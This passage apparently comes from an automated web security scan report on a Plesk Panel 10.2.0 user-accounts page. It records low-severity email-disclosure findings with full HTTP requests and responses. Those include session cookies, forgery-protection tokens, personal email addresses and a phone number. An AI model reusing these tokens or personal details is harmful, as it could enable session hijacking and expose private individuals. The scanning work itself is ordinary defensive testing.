<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/list

Issue detail

The following email addresses were disclosed in the response:

format-1@nosedivesailing.com
fdf080d9155e57dfcfa94264@vulnerable.host.fqdn
format-1fdf080d9644e588dffa16265@nosedivesailing.com
h02332@gmail.com

Request

GET /smb/user/list HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=d92187f07d1a80c8d90db119609cd480

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:54 GMT
Connection: close
Content-Length: 14316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="ac96ec24fae152c446439f0afde39de7" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>User Accounts - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Flist' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>User Accounts</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"User Accounts","href":"\/user\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"User Roles","href":"\/role\/list","containerCls":""}] });
});
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   new Jsw.Hint({
renderTo: 'main',
hint: 'If you want to allow other users to access the Panel for managing websites, installed applications, or use e-mail services under your domains, then you need to create user accounts.' });

new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',
items: [
new Jsw.List({
id: 'users-list',
searchOveral: 'name',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":4,"totalItemCount":4,"firstItemNumber":1,"lastItemNumber":4},"state":{"sortField":"contactName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""},"email":{"searchText":""},"role":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"3","isBuiltIn":"0","contactName":"format-1","email":"format-1@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"4","isBuiltIn":"0","contactName":"format-1","email":"fdf080d9155e57dfcfa94264@vulnerable.host.fqdn","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":"1","isLocked":"0"},{"id":"5","isBuiltIn":"0","contactName":"format-1","email":"format-1fdf080d9644e588dffa16265@nosedivesailing.com","roleId":"7","roleName":"Application User","roleIsBuiltIn":"0","phone":null,"isLocked":"0"},{"id":"2","isBuiltIn":"1","contactName":"Hoyt LLC Research","email":"h02332@gmail.com","roleId":"5","roleName":"Owner","roleIsBuiltIn":"1","phone":"+1 339 206 1886","isLocked":"0"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/user/list-data',
disabledSelectHint: 'This user account cannot be removed because it is either a built-in user account or your own user account.',
       searchFilters: {"name":{"type":"text","fields":["contactName"],"options":null,"title":"Contact name","overal":false},"email":{"type":"text","fields":["email"],"options":null,"title":"E-mail address","overal":false},"role":{"type":"text","fields":["roleId"],"options":[{"type":"value","label":"Any","value":""},{"type":"value","label":"Accountant","value":"8"},{"type":"value","label":"Application User","value":"7"},{"type":"value","label":"Owner","value":"5"},{"type":"value","label":"WebMaster","value":"6"}],"title":"User role","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Contact name',
sortable: true,
dataIndex: 'contactName',
renderer: function(item, isDisabled) {
var link = '<a href="' + Jsw.baseUrl + '/user/edit/id/' + item.id + '">'
+ item.contactName.escapeHTML() + '</a>';

var status = (1 == item.isLocked)
? ( '<span class="hint-attention ">' +
'Inactive' +
'</span>')
: '';

return link + status;
}
}, {
header: 'E-mail address',
sortable: true,
cls: 'minor',
dataIndex: 'email',
renderer: function(item) {
return item.email
? '<a href="mailto:' + item.email + '">' + item.email + '</a>'
: '';
}
}, {
header: 'Role',
cls: 'minor',
sortable: true,
dataIndex: 'roleName'
}
],
operations: [{
componentType: 'Jsw.SmallButton',
title: 'Create User Account',
description: 'Create a new user account.',
addCls: 'sb-add-user',
href: '/user/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveUser',
title: 'Remove',
description: 'Remove the selected user accounts.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('users-list').execGroupOperation({
url: '/user/delete/?redirect=/user/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected user accounts?' }
});
}
}
],
isDisabledItem: function(item) {
return ((1 == item.isBuiltIn) || (item.id == 2));
}
})
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/list

Issue detail

The following email addresses were disclosed in the response:

format-1@nosedivesailing.com
fdf080d9224fd0d18957a62c@vulnerable.host.fqdn
format-1fdf080d9644e588dffa16265@nosedivesailing.com
h02332@gmail.com

Request

GET /smb/user/list HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:07 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:07 GMT
Connection: close
Content-Length: 14317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>User Accounts - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

